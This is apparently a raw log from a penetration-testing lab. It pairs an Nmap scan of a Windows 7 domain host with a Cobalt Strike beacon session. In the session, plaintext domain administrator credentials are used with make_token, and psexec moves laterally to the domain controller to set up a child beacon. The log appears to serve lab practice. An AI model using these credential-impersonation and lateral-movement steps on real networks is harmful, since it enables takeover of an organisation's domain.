Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 21:31 CST mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.0.162 Host is up (0.0098s latency). Not shown: 992 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38) |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN) 3306/tcp open mysql MySQL (unauthorized) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC MAC Address: 00:0C:29:B9:F4:45 (VMware) Device type: general purpose|media device Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 Network Distance: 1 hop Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_nbstat: NetBIOS name: WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:b9:f4:45 (VMware) |_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: win7 | NetBIOS computer name: WIN7\x00 | Domain name: sun.com | Forest name: sun.com | FQDN: win7.sun.com |_ System time: 2021-12-27T21:32:33+08:00 | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb2-time: | date: 2021-12-27T13:32:33 |_ start_date: 2021-12-24T10:19:01
TRACEROUTE HOP RTT ADDRESS 1 9.84 ms 192.168.0.162
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 68.16 seconds
beacon> rev2self beacon> make_token SUN\Administrator hongrisec@2019 beacon> jump psexec DC 域控 [+] host called home, sent: 58 bytes [+] Impersonated NT AUTHORITY\SYSTEM [*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2835) on DC via Service Control Manager (\\DC\ADMIN$\79a9e06.exe) [+] host called home, sent: 285790 bytes [+] received output: Started service 79a9e06 on DC [+] host called home, sent: 74 bytes [+] established link to child beacon: 192.168.138.138